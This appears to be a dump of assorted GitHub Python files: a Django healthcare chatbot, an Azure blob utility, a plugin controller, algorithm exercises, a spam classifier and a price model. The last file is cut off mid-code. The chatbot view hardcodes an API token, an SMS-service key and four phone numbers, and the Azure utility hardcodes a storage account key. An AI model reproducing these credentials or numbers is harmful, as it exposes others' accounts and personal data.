models import events\nfrom chatterbot import ChatBot\nfrom chatterbot.trainers import ListTrainer\nimport os\nimport pyttsx3\nimport pythoncom\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\n\ndef index(request):\n\n sympapiurl = 'https://healthservice.priaid.ch/symptoms?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJlbWFpbCI6ImJvdXJuZWphc29tQGdtYWlsLmNvbSIsInJvbGUiOiJVc2VyIiwiaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNS8wNS9pZGVudGl0eS9jbGFpbXMvc2lkIjoiMjE4NyIsImh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd3MvMjAwOC8wNi9pZGVudGl0eS9jbGFpbXMvdmVyc2lvbiI6IjEwOCIsImh0dHA6Ly9leGFtcGxlLm9yZy9jbGFpbXMvbGltaXQiOiIxMDAiLCJodHRwOi8vZXhhbXBsZS5vcmcvY2xhaW1zL21lbWJlcnNoaXAiOiJCYXNpYyIsImh0dHA6Ly9leGFtcGxlLm9yZy9jbGFpbXMvbGFuZ3VhZ2UiOiJlbi1nYiIsImh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd3MvMjAwOC8wNi9pZGVudGl0eS9jbGFpbXMvZXhwaXJhdGlvbiI6IjIwOTktMTItMzEiLCJodHRwOi8vZXhhbXBsZS5vcmcvY2xhaW1zL21lbWJlcnNoaXBzdGFydCI6IjIwMTktMDMtMzAiLCJpc3MiOiJodHRwczovL2F1dGhzZXJ2aWNlLnByaWFpZC5jaCIsImF1ZCI6Imh0dHBzOi8vaGVhbHRoc2VydmljZS5wcmlhaWQuY2giLCJleHAiOjE1NTQwMDMxOTUsIm5iZiI6MTU1Mzk5NTk5NX0.6jfHY8Svx35hiBY3ZgKbTxmOzfY6cbmMWu3GSFV9iUo&format=json&language=en-gb'\n r = requests.get(sympapiurl).json()\n dataset = events.objects.all()\n data = dataset.get(name = 'Harsh')\n\n return render(request , 'dashboard/index.html' ,{'r' : r , 'data':data })\n\n\ndef charts(request):\n \n return render(request, 'dashboard/charts.html')\n\ndef push(request):\n return render(request, 'dashboard/push.html')\n\n\ndef chatbot(request):\n requestlist = []\n responselist = []\n pythoncom.CoInitialize()\n dataset = events.objects.all()\n data = dataset.get(name = 'Harsh')\n bot = ChatBot('Sheku',tie_breaking_method=\"random_response\")\n trainer = ListTrainer(bot)\n sheku = pyttsx3.init()\n\n for _file in os.listdir('files'):\n \tchats = open(\"files/\" + _file , 'r').readlines()\n\n\n trainer.train(chats)\n\n request = request.POST['message']\n requestlist.append(request)\n response = bot.get_response(request)\n responselist.append(response)\n sheku.say(response)\n print(response)\n sheku.runAndWait()\n analyzer = SentimentIntensityAnalyzer()\n analy = analyzer.polarity_scores(response)\n\n if(analy['neg'] == 0.9 ):\n print(\"Sending a Text!\")\n url = \"https://www.fast2sms.com/dev/bulk\"\n\n querystring = {\"authorization\":\"oA10WXBMQbDtzSvRa5g3yhYl9kqEdNJZjscIrUfPxOu82w7GeTszBb1Yy5q7nTvjOg8fSolx0wuci2IX\",\"sender_id\":\"FSTSMS\",\"message\":\"Emergency Message! 
I am In Distress, Please reach out to me!\",\"language\":\"english\",\"route\":\"t\",\"numbers\":\"8898427027,9930335323,7021272227,7718904478\"}\n\n headers = {\n 'cache-control': \"no-cache\"\n }\n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n print(response.text)\n\n\n return render_to_response('dashboard/widgets.html' , { 'requestlist': requestlist , 'responselist': responselist })\n\n\ndef widgets(request):\n # pythoncom.CoInitialize()\n dataset = events.objects.all()\n data = dataset.get(name = 'Harsh')\n # bot = ChatBot('Sheku',tie_breaking_method=\"random_response\")\n # trainer = ListTrainer(bot)\n # sheku = pyttsx3.init()\n #\n # for _file in os.listdir('files'):\n # \tchats = open(\"files/\" + _file , 'r').readlines()\n #\n # trainer.train(chats)\n #\n # request = request.POST['message']\n # response = bot.get_response(request)\n # sheku.say(response)\n # print(response)\n # sheku.runAndWait()\n #\n\n # while True:\n # \trequest = input(data.name +':')\n # \tresponse = bot.get_response(request)\n # \tsheku.say(response)\n # \tprint(\"Sheku:\",response)\n # \tsheku.runAndWait()\n\n\n return render(request, 'dashboard/widgets.html' , { 'data': data})\n","repo_name":"AzizYR/HealthCare","sub_path":"dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15743699606","text":"import json\r\nimport pandas as pd\r\nfrom pandas import json_normalize\r\nfrom azure.storage.blob import BlobServiceClient, BlobClient, ContainerClient\r\nimport os\r\nimport re\r\n\r\nConnection_String_to_blob = os.environ.get('Connection_String_to_blob')\r\n\r\ndef get_blob_service_client():\r\n connection_string = Connection_String_to_blob\r\n return BlobServiceClient.from_connection_string(connection_string)\r\n\r\ndef upload_to_blob_storage(file_path, filename):\r\n blob_service_client = get_blob_service_client()\r\n container_name = 'peearzchatdocupload' # Create a container in your Blob storage account\r\n\r\n # Get a blob client\r\n blob_client = blob_service_client.get_blob_client(container=container_name, blob=filename)\r\n\r\n # Upload the file to Blob storage\r\n with open(file_path, 'rb') as data:\r\n blob_client.upload_blob(data, overwrite=True)\r\n\r\ndef json_csv(path_to_store, file):\r\n\r\n dictionary = json.loads(file)\r\n\r\n df = None\r\n first = True\r\n\r\n for document in dictionary:\r\n if document == None:\r\n continue\r\n else:\r\n dfLeft = json_normalize(document)\r\n\r\n for title, value in document.items():\r\n if type(value) == list:\r\n dfLeft.drop(title, axis=\"columns\", inplace=True)\r\n dfRight = json_normalize(value)\r\n dfRight = dfRight.add_prefix(f\"{title}_\")\r\n dfLeft = pd.concat([dfLeft, dfRight], axis = 1) \r\n\r\n if first:\r\n df = dfLeft\r\n first = False\r\n else:\r\n df = pd.concat([df, dfLeft], axis = 0)\r\n\r\n df.reset_index(inplace=True, drop=True)\r\n\r\n df1 = df.T.drop_duplicates().T\r\n\r\n #file_location = os.path.join(app.config['UPLOAD_FOLDER'])\r\n #df1.to_csv('file_path/test.csv')\r\n\r\n df1.to_csv('test.csv')\r\n #upload_to_blob_storage(os.path.join(path_to_store, 'test.csv'), 'test.csv')\r\n\r\ndef rename_ivalidfilename(filename):\r\n # Funtion used to Remove any characters that are non alphanumeric\r\n return re.sub(r'[^a-zA-Z0-9\\.\\-_]', '', filename)\r\n\r\ndef blob_filereader(account_name, account_key, container_name):\r\n # Funtion used to read all the files in blob 
storage\r\n try:\r\n # Creating BlobServiceClient by providing account credentials\r\n account_creds = BlobServiceClient(account_url=f\"https://{account_name}.blob.core.windows.net\", credential=account_key)\r\n \r\n # Getting a reference to the container\r\n container_client = account_creds.get_container_client(container_name)\r\n\r\n # Listing all files in the container\r\n blob_files = container_client.list_blobs()\r\n\r\n for blob in blob_files:\r\n # Extract the blob name\r\n blob_name = blob.name\r\n\r\n # Renaming the blob name to remove non alpanumeric characters\r\n rename_blob_name = rename_ivalidfilename(blob_name)\r\n\r\n # Downloading and handling files without attempting to decode them\r\n file_extension = rename_blob_name.split('.')[-1]\r\n blob_client = container_client.get_blob_client(blob_name)\r\n\r\n if file_extension in ['pdf', 'png', 'jpg', 'csv', 'json', 'txt']:\r\n try:\r\n content = blob_client.download_blob().readall()\r\n with open(rename_blob_name, 'wb') as file:\r\n file.write(content)\r\n print(f\"File Downloaded: {rename_blob_name}\")\r\n except Exception as e:\r\n print(f\"Error downloading {rename_blob_name}: {str(e)}\")\r\n else:\r\n # Read and print the contents of text files\r\n try:\r\n content = blob_client.download_blob().readall()\r\n print(f\"Contents of {rename_blob_name}: {content.decode('utf-8')}\")\r\n except Exception as e:\r\n print(f\"Error reading {rename_blob_name}: {str(e)}\")\r\n except Exception as e:\r\n print(f\"An error occurred: {str(e)}\")\r\n \r\n \r\naccount_name = 'peearztest'\r\naccount_key = '2SIi75BD/kTMdGkvCjH8uI1hTH436whrLkTKRJBOG413rV3VRGElBbtAg4zw9E0wn180jku8je5g+ASt42Kttw=='\r\ncontainer_name = 'peearziois'\r\nblob_filereader(account_name, account_key, container_name)\r\n\r\n'''def json_csv(path_to_csv, file): # NEW FUNCTION 3\r\n #print(\"FILE IS :\",file)\r\n df = pd.read_json(file)\r\n print(df.head())\r\n df.to_csv('test.csv')'''\r\n\r\n'''\r\ndef fetch_file_from_blob(container_name, blob_name, destination_path):\r\n blob_service_client = get_blob_service_client()\r\n container_client = blob_service_client.get_container_client(container_name)\r\n blob_client = container_client.get_blob_client(blob_name)\r\n\r\n with open(destination_path, \"wb\") as file:\r\n blob_data = blob_client.download_blob()\r\n file.write(blob_data.readall())\r\n\r\ndef json_csv(json_file_path, csv_file_path): NEW FUNCTION 2\r\n \"\"\"\r\n Convert a JSON file to a CSV file.\r\n\r\n Parameters:\r\n json_file_path (str): Path to the input JSON file.\r\n csv_file_path (str): Path to the output CSV file.\r\n \"\"\"\r\n with open(json_file_path, 'r') as json_file:\r\n data = json.load(json_file)\r\n\r\n with open(csv_file_path, 'w', newline='') as csv_file:\r\n # Extract the headers from the first item in the JSON data\r\n headers = list(data[0].keys())\r\n\r\n # Create a CSV writer and write the header row\r\n writer = csv.DictWriter(csv_file, fieldnames=headers)\r\n writer.writeheader()\r\n\r\n # Write each row to the CSV file\r\n writer.writerows(data)\r\n\r\ndef download_blob_to_file(container_name='peearzchatdocupload'):\r\n blob_service_client = get_blob_service_client()\r\n blob_client = blob_service_client.get_blob_client(container=container_name, blob=\"test.csv\")\r\n with open(file=os.path.join(r'/Users/ankitanand/Documents/Peearz/', 'test.csv'), mode=\"wb\") as sample_blob:\r\n download_stream = blob_client.download_blob()\r\n sample_blob = download_stream.readall()\r\n return 
sample_blob'''\r\n","repo_name":"pranav3993/Doc_Chat_App","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37697080054","text":"# -*- coding: UTF-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\n__author__ = \"d01\"\n__email__ = \"jungflor@gmail.com\"\n__copyright__ = \"Copyright (C) 2015-16, Florian JUNG\"\n__license__ = \"MIT\"\n__version__ = \"0.1.0\"\n__date__ = \"2016-03-29\"\n# Created: 2015-06-10 23:54\n\nimport threading\n\nfrom .pluginInterface import Plugin, PluginStartException\nfrom paps.person import Person\n\n\nclass CrowdController(Plugin):\n \"\"\"\n Manages the audience state and the plugins\n \"\"\"\n\n def __init__(self, settings=None):\n \"\"\"\n Initialize object\n\n :param settings: Settings to be passed to init (default: None)\n :type settings: dict | None\n :rtype: None\n :raises ValueError: No plugins given\n \"\"\"\n if settings is None:\n settings = {}\n super(CrowdController, self).__init__(settings)\n\n self.plugins = settings.get('plugins')\n \"\"\" :type plugins: list[paps.crowd.pluginInterface.Plugin] \"\"\"\n if not self.plugins:\n raise ValueError(\"No plugins registered\")\n self._people = {}\n \"\"\" Current state of audience - person.id: Person()\n :type _people: dict[str, paps.person.Person] \"\"\"\n self._people_lock = threading.Lock()\n \"\"\" Lock to control access to ._people \"\"\"\n\n def on_person_new(self, people):\n \"\"\"\n New people joined the audience\n\n :param people: People that just joined the audience\n :type people: list[paps.person.Person]\n :rtype: None\n \"\"\"\n self.debug(\"()\")\n changed = []\n with self._people_lock:\n for p in people:\n person = Person.from_person(p)\n if person.id in self._people:\n self.warning(\n u\"{} already in audience\".format(person.id)\n )\n self._people[person.id] = person\n changed.append(person)\n for plugin in self.plugins:\n try:\n plugin.on_person_new(changed)\n except:\n self.exception(\n u\"Failed to send new people to {}\".format(plugin.name)\n )\n\n def on_person_leave(self, people):\n \"\"\"\n People left the audience\n\n :param people: People that left\n :type people: list[paps.person.Person]\n :rtype: None\n \"\"\"\n self.debug(\"()\")\n changed = []\n with self._people_lock:\n for p in people:\n person = Person.from_person(p)\n if person.id not in self._people:\n self.warning(u\"{} not in audience\".format(person.id))\n else:\n del self._people[person.id]\n changed.append(person)\n for plugin in self.plugins:\n try:\n plugin.on_person_leave(changed)\n except:\n self.exception(\n u\"Failed to send leaving people to {}\".format(plugin.name)\n )\n\n def on_person_update(self, people):\n \"\"\"\n People have changed (e.g. a sensor value)\n\n :param people: People whos state changed (may include unchanged)\n :type people: list[paps.person.Person]\n :rtype: None\n \"\"\"\n self.debug(\"()\")\n changed = []\n with self._people_lock:\n for p in people:\n person = Person.from_person(p)\n if person.id not in self._people:\n self.warning(u\"{} not in audience\".format(person.id))\n self._people[person.id] = person\n # Check if really changed? 
- trust source for now\n changed.append(person)\n for plugin in self.plugins:\n try:\n plugin.on_person_update(changed)\n except:\n self.exception(\n u\"Failed to send updated people to {}\".format(plugin.name)\n )\n\n @property\n def people(self):\n \"\"\"\n Get people of current audience\n\n :return: Current people\n :rtype: list[paps.people.People]\n \"\"\"\n with self._people_lock:\n return self._people.values()\n\n def start(self, blocking=False):\n \"\"\"\n Start the interface\n\n :param blocking: Should the call block until stop() is called\n (default: False)\n :type blocking: bool\n :rtype: None\n \"\"\"\n self.debug(\"()\")\n # Start the plugins\n for plugin in self.plugins:\n try:\n # Inject self into plugin\n plugin.controller = self\n plugin.start(blocking=False)\n except:\n self.exception(\n u\"Failed to start plugin {}\".format(plugin.name)\n )\n raise PluginStartException(\n \"Starting one or more plugins failed\"\n )\n super(CrowdController, self).start(blocking=blocking)\n\n def stop(self):\n \"\"\"\n Stop the interface\n\n :rtype: None\n \"\"\"\n self.debug(\"()\")\n # Stop the plugins\n for plugin in self.plugins:\n try:\n plugin.stop()\n except:\n self.exception(u\"Failed to stop plugin {}\".format(plugin.name))\n super(CrowdController, self).stop()\n","repo_name":"the01/python-paps","sub_path":"paps/crowd/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":5482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29375565057","text":"class Solution(object):\n def coinChange(self, coins: list, amount):\n \"\"\"\n :type coins: List[int]\n :type amount: int\n :rtype: int\n \"\"\"\n _len = len(coins)\n dp = [10000 for _ in range(amount + 1)]\n dp[0] = 0\n for i in range(1, amount + 1):\n if i in coins:\n dp[i] = 1\n continue\n for j in coins:\n dp[i] = min(dp[i - j] + 1, dp[i]) if i - j >= 0 else dp[i]\n return dp[-1] if dp[-1] < 10000 else -1\n\n\nif __name__ == '__main__':\n print(Solution().coinChange([312343256], 2))\n","repo_name":"wangqi1996/leetcode","sub_path":"coin-change.py","file_name":"coin-change.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42574015154","text":"from sinv.algorithms import bcr_s\nfrom sinv import utils\n\nimport numpy as np\nimport pytest\nfrom mpi4py import MPI\n\nSEED = 63\n\n\n\n\"\"\" Uniform blocksize tests cases \n- Complex and real matrices\n- Symmetric and non-symmetric matrices\n================================================\n| Test n | Matrice size | Blocksize | nblocks | \n================================================\n| Test 1 | 2x2 | 1 | 2 |\n| Test 2 | 4x4 | 2 | 2 |\n| Test 3 | 6x6 | 3 | 2 |\n================================================\n| Test 4 | 3x3 | 1 | 3 |\n| Test 5 | 6x6 | 2 | 3 |\n| Test 6 | 9x9 | 3 | 3 |\n================================================\n| Test 7 | 128x128 | 8 | 16 |\n| Test 8 | 128x128 | 16 | 8 |\n| Test 9 | 128x128 | 32 | 4 |\n================================================ \"\"\"\n@pytest.mark.mpi_skip()\n@pytest.mark.parametrize(\"is_complex\", [False, True])\n@pytest.mark.parametrize(\"is_symmetric\", [False, True])\n@pytest.mark.parametrize(\n \"matrix_size, blocksize\",\n [\n (9, 1),\n (18, 2),\n (27, 3),\n (12, 1),\n (24, 2),\n (36, 3),\n (256, 8),\n (240, 10),\n (144, 12),\n ]\n)\ndef test_bcrs(\n is_complex: bool,\n is_symmetric: bool,\n matrix_size: int,\n blocksize: int\n):\n \"\"\" Test the 
BSR-S algorithm. \"\"\"\n bandwidth = np.ceil(blocksize/2)\n \n A = utils.matu.generateBandedDiagonalMatrix(matrix_size, bandwidth, is_complex, is_symmetric, SEED)\n\n G = bcr_s.bcr_serial(A, blocksize)\n G_bcr_s_bloc_diag, G_bcr_s_bloc_upper, G_bcr_s_bloc_lower = utils.matu.convertDenseToBlkTridiag(G, blocksize)\n \n A_refsol = np.linalg.inv(A)\n A_refsol_bloc_diag, A_refsol_bloc_upper, A_refsol_bloc_lower = utils.matu.convertDenseToBlkTridiag(A_refsol, blocksize)\n \n assert np.allclose(A_refsol_bloc_diag, G_bcr_s_bloc_diag)\n assert np.allclose(A_refsol_bloc_upper, G_bcr_s_bloc_upper)\n assert np.allclose(A_refsol_bloc_lower, G_bcr_s_bloc_lower)\n \n \n ","repo_name":"Nano-TCAD/SINV","sub_path":"tests/bcr_tests/bcr_serial_test.py","file_name":"bcr_serial_test.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"3267167566","text":"from elliptics.core import Node\nfrom socket import AF_INET\nfrom elliptics.route import Address\n\n\nclass Node(Node):\n def add_remote(self, addr, port=None, family=AF_INET):\n if type(addr) is Address:\n super(Node, self).add_remote(addr=addr.host,\n port=addr.port,\n family=addr.family)\n elif not port and type(addr) is str:\n super(Node, self).add_remote(addr=addr)\n elif port and type(addr) is str:\n super(Node, self).add_remote(addr=addr,\n port=port,\n family=family)\n","repo_name":"dkangin/elliptics","sub_path":"bindings/python/src/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"9852067064","text":"import streamlit as st\r\nimport pickle\r\nimport string\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.stem.porter import PorterStemmer\r\nfrom nltk.tokenize import word_tokenize\r\nimport os\r\nimport nltk\r\n\r\ntfidf = pickle.load(open('tfidfv', 'rb'))\r\nmodel=pickle.load(open('mnbc','rb'))\r\nnltk.download('stopwords')\r\nnltk.download('punkt')\r\nst.title('SMS Spam Classifier')\r\nsms=st.text_area(label='sms input')\r\n\r\ndef vector_text(text):\r\n text=text.lower()\r\n text=text.translate(str.maketrans('','',string.punctuation))\r\n ps=PorterStemmer()\r\n text=' '.join([ps.stem(word) for word in word_tokenize(text) if word not in stopwords.words('english')])\r\n return text\r\nif st.button('Know Spam sms'):\r\n cleaned_sms=vector_text(sms)\r\n vector_sms=tfidf.transform([cleaned_sms])\r\n pred=model.predict(vector_sms)[0]\r\n if pred==1:\r\n st.header('Spam')\r\n else:\r\n st.header('Not Spam')\r\n","repo_name":"haripy123/spam-classifier","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32659506299","text":"import sys\n\n# 시, 분, 초를 입력하고 추가 add_sec 시간을 입력\nh, m, s = map(int, sys.stdin.readline().split())\nadd_sec = int(sys.stdin.readline())\n\n# 시,분,초를 초단위로 통합\ntotal_time = h * 3600 + m * 60 + s + add_sec\n\n# add_sec를 추가한 후의 시,분,초를 구함\nafter_hour = (total_time // 3600) \nafter_min = (total_time - (after_hour * 3600)) // 60\nafter_sec = total_time - (after_hour * 3600) - (after_min * 60)\n\nprint(after_hour % 24, after_min, after_sec)","repo_name":"KimHyungkeun/Algorithm","sub_path":"Baekjoon/수학/2530_인공지능시계.py","file_name":"2530_인공지능시계.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} 
+{"seq_id":"74862765584","text":"def minimumBribes(q):\n bribes = 0\n\n for i, a in enumerate(q):\n i_adj = i + 1\n\n if a - i_adj > 2:\n print(\"Too chaotic\")\n return\n \n for b in q[max(a-2, 0):i]:\n if b > a:\n bribes += 1\n \n print(bribes)\n \nif __name__ == '__main__':\n t = int(input().strip())\n\n for t_itr in range(t):\n n = int(input().strip())\n\n q = list(map(int, input().rstrip().split()))\n\n minimumBribes(q)\n","repo_name":"lrmantovani10/Algorithms","sub_path":"Arrays/New_Years_Chaos.py","file_name":"New_Years_Chaos.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44458470378","text":"isbn = input(\"ISBN碼:\")\nnum=[]\n\nfor i in isbn:\n if i=='X':\n num.append(10)\n else:\n num.append(int(i))\n\nfor i in range(len(num)-1):\n num[i+1] = num[i] + num[i+1]\nprint(\"第一次累加和:\" , num)\n\nfor i in range(len(num)-1):\n num[i+1] = num[i] + num[i+1]\nprint(\"第二次累加和:\" , num)\n\nif num[-1]%11 == 0:\n print(\"YES\")\nelse:\n print(\"NO\")\n","repo_name":"Jia35/-Python-Tutorial","sub_path":"file/code/hw17.py","file_name":"hw17.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40713199578","text":"from __future__ import annotations\nimport datetime\nfrom dataclasses import dataclass, field\nfrom kiota_abstractions.serialization import AdditionalDataHolder, Parsable, ParseNode, SerializationWriter\nfrom kiota_abstractions.store import BackedModel, BackingStore, BackingStoreFactorySingleton\nfrom typing import Any, Callable, Dict, List, Optional, TYPE_CHECKING, Union\nfrom uuid import UUID\n\nif TYPE_CHECKING:\n from .account import Account\n\n@dataclass\nclass JournalLine(AdditionalDataHolder, BackedModel, Parsable):\n # Stores model information.\n backing_store: BackingStore = field(default_factory=BackingStoreFactorySingleton(backing_store_factory=None).backing_store_factory.create_backing_store, repr=False)\n\n # Stores additional data not described in the OpenAPI description found when deserializing. 
Can be used for serialization as well.\n additional_data: Dict[str, Any] = field(default_factory=dict)\n # The account property\n account: Optional[Account] = None\n # The accountId property\n account_id: Optional[UUID] = None\n # The accountNumber property\n account_number: Optional[str] = None\n # The amount property\n amount: Optional[float] = None\n # The comment property\n comment: Optional[str] = None\n # The description property\n description: Optional[str] = None\n # The documentNumber property\n document_number: Optional[str] = None\n # The externalDocumentNumber property\n external_document_number: Optional[str] = None\n # The id property\n id: Optional[UUID] = None\n # The journalDisplayName property\n journal_display_name: Optional[str] = None\n # The lastModifiedDateTime property\n last_modified_date_time: Optional[datetime.datetime] = None\n # The lineNumber property\n line_number: Optional[int] = None\n # The OdataType property\n odata_type: Optional[str] = None\n # The postingDate property\n posting_date: Optional[datetime.date] = None\n \n @staticmethod\n def create_from_discriminator_value(parse_node: Optional[ParseNode] = None) -> JournalLine:\n \"\"\"\n Creates a new instance of the appropriate class based on discriminator value\n param parse_node: The parse node to use to read the discriminator value and create the object\n Returns: JournalLine\n \"\"\"\n if not parse_node:\n raise TypeError(\"parse_node cannot be null.\")\n return JournalLine()\n \n def get_field_deserializers(self,) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"\n The deserialization information for the current model\n Returns: Dict[str, Callable[[ParseNode], None]]\n \"\"\"\n from .account import Account\n\n from .account import Account\n\n fields: Dict[str, Callable[[Any], None]] = {\n \"account\": lambda n : setattr(self, 'account', n.get_object_value(Account)),\n \"accountId\": lambda n : setattr(self, 'account_id', n.get_uuid_value()),\n \"accountNumber\": lambda n : setattr(self, 'account_number', n.get_str_value()),\n \"amount\": lambda n : setattr(self, 'amount', n.get_float_value()),\n \"comment\": lambda n : setattr(self, 'comment', n.get_str_value()),\n \"description\": lambda n : setattr(self, 'description', n.get_str_value()),\n \"documentNumber\": lambda n : setattr(self, 'document_number', n.get_str_value()),\n \"externalDocumentNumber\": lambda n : setattr(self, 'external_document_number', n.get_str_value()),\n \"id\": lambda n : setattr(self, 'id', n.get_uuid_value()),\n \"journalDisplayName\": lambda n : setattr(self, 'journal_display_name', n.get_str_value()),\n \"lastModifiedDateTime\": lambda n : setattr(self, 'last_modified_date_time', n.get_datetime_value()),\n \"lineNumber\": lambda n : setattr(self, 'line_number', n.get_int_value()),\n \"@odata.type\": lambda n : setattr(self, 'odata_type', n.get_str_value()),\n \"postingDate\": lambda n : setattr(self, 'posting_date', n.get_date_value()),\n }\n return fields\n \n def serialize(self,writer: SerializationWriter) -> None:\n \"\"\"\n Serializes information the current object\n param writer: Serialization writer to use to serialize this model\n Returns: None\n \"\"\"\n if not writer:\n raise TypeError(\"writer cannot be null.\")\n writer.write_object_value(\"account\", self.account)\n writer.write_uuid_value(\"accountId\", self.account_id)\n writer.write_str_value(\"accountNumber\", self.account_number)\n writer.write_float_value(\"amount\", self.amount)\n writer.write_str_value(\"comment\", self.comment)\n 
writer.write_str_value(\"description\", self.description)\n writer.write_str_value(\"documentNumber\", self.document_number)\n writer.write_str_value(\"externalDocumentNumber\", self.external_document_number)\n writer.write_uuid_value(\"id\", self.id)\n writer.write_str_value(\"journalDisplayName\", self.journal_display_name)\n writer.write_datetime_value(\"lastModifiedDateTime\", self.last_modified_date_time)\n writer.write_int_value(\"lineNumber\", self.line_number)\n writer.write_str_value(\"@odata.type\", self.odata_type)\n writer.write_date_value(\"postingDate\", self.posting_date)\n writer.write_additional_data_value(self.additional_data)\n \n\n","repo_name":"microsoftgraph/msgraph-beta-sdk-python","sub_path":"msgraph_beta/generated/models/journal_line.py","file_name":"journal_line.py","file_ext":"py","file_size_in_byte":5388,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"48"} +{"seq_id":"74097266384","text":"\"\"\"\noriginal TFIDF model\n\"\"\"\n\nimport os; os.environ['OMP_NUM_THREADS'] = '1'\nfrom contextlib import contextmanager\nfrom functools import partial\nfrom operator import itemgetter\nfrom multiprocessing.pool import ThreadPool\nimport time\nfrom typing import List, Dict\n\nimport keras as ks\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn.feature_extraction import DictVectorizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer as Tfidf\nfrom sklearn.pipeline import make_pipeline, make_union, Pipeline, FeatureUnion\nfrom sklearn.preprocessing import FunctionTransformer, StandardScaler\nfrom sklearn.metrics import mean_squared_log_error\nfrom sklearn.model_selection import KFold\nfrom sklearn.base import TransformerMixin\n\nBASE_DIR = os.getcwd()\nBASE_DIR = os.path.dirname(BASE_DIR)\n\n# @contextmanager\ndef timer(name):\n t0 = time.time()\n yield\n #print(f'[{name}] done in {time.time() - t0:.0f} s')\n\ndef preprocess(df: pd.DataFrame) -> pd.DataFrame:\n df['name'] = df['name'].fillna('') + ' ' + df['brand_name'].fillna('')\n df['text'] = (df['item_description'].fillna('') + ' ' + df['name'] + ' ' + df['category_name'].fillna(''))\n return df\n\ndef on_field(f: str, *vec) -> Pipeline:\n return make_pipeline(FunctionTransformer(itemgetter(f), validate=False), *vec)\n\ndef to_records(df: pd.DataFrame) -> List[Dict]:\n return df.to_dict(orient='records')\n\ndef fit_predict(xs, y_train) -> np.ndarray:\n X_train, X_test = xs\n # config = tf.ConfigProto(\n # intra_op_parallelism_threads=1, use_per_session_threads=1, inter_op_parallelism_threads=1)\n with tf.Session( graph=tf.Graph() ) as sess :\n ks.backend.set_session(sess)\n model_in = ks.Input(shape=(X_train.shape[1],), dtype='float32', sparse=True)\n out = ks.layers.Dense(192, activation='relu')(model_in)\n out = ks.layers.Dense(64, activation='relu')(out)\n out = ks.layers.Dense(64, activation='relu')(out)\n out = ks.layers.Dense(1)(out)\n model = ks.Model(model_in, out)\n model.compile(loss='mean_squared_error', optimizer=ks.optimizers.Adam(lr=3e-3))\n for i in range(3):\n # with timer(f'epoch {i + 1}'):\n model.fit(x=X_train, y=y_train, batch_size=2**(11 + i), epochs=1, verbose=0)\n return model.predict(X_test)[:, 0]\n\nclass ColumnExtractor(TransformerMixin):\n def __init__(self, cols):\n self.cols = cols\n\n def fit(self, X, y=None):\n # stateless transformer\n return self\n\n def transform(self, X):\n # assumes X is a DataFrame\n Xcols = X[self.cols]\n return Xcols\n\nclass ToDict(TransformerMixin):\n def __init__(self, 
cols):\n self.cols = cols\n\n def fit(self, X, y=None):\n # stateless transformer\n return self\n\n def transform(self, X):\n # assumes X is a DataFrame\n Xdict = X.to_dict('records')\n return Xdict\n\n\nvectorizer = FeatureUnion([\n ('continuous', Pipeline([\n ('extract', ColumnExtractor('name')),\n ('tfidf', Tfidf(max_features=100000, token_pattern='\w+'))\n ])),\n ('text', Pipeline([\n ('extract', ColumnExtractor('text')),\n ('tfidf', Tfidf(max_features=100000, token_pattern='\w+', ngram_range=(1, 2)))\n ])),\n ('shippingCondition', Pipeline([\n ('extract', ColumnExtractor(['shipping', 'item_condition_id'])),\n ('ToDict', ToDict(['shipping', 'item_condition_id'])),\n ('DictVectorizer', DictVectorizer())\n ])),\n ])\n\ny_scaler = StandardScaler()\n\n\ndef load_data():\n train = pd.read_csv(os.path.join(os.path.join(BASE_DIR, 'Challenge\Data'), 'train_mock.tsv'),\n sep='\t', encoding='utf-8')\n train = train[train['price'] > 0].reset_index(drop=True)\n train = preprocess(train)\n\n valid = pd.read_csv(os.path.join(os.path.join(BASE_DIR, 'data'), 'test_mock.tsv'),\n sep='\t', encoding='utf-8')\n valid = valid[valid['price'] > 0].reset_index(drop=True)\n valid = preprocess(valid)\n\n return train, valid\n\ndef main():\n train, valid = load_data()\n y_train = y_scaler.fit_transform(np.log1p(train['price'].values.reshape(-1, 1)))\n X_train = vectorizer.fit_transform(preprocess(train)).astype(np.float32)\n print(f'X_train: {X_train.shape} of {X_train.dtype}')\n #del train\n X_valid = vectorizer.transform(preprocess(valid)).astype(np.float32)\n print('X_valid shape:')\n 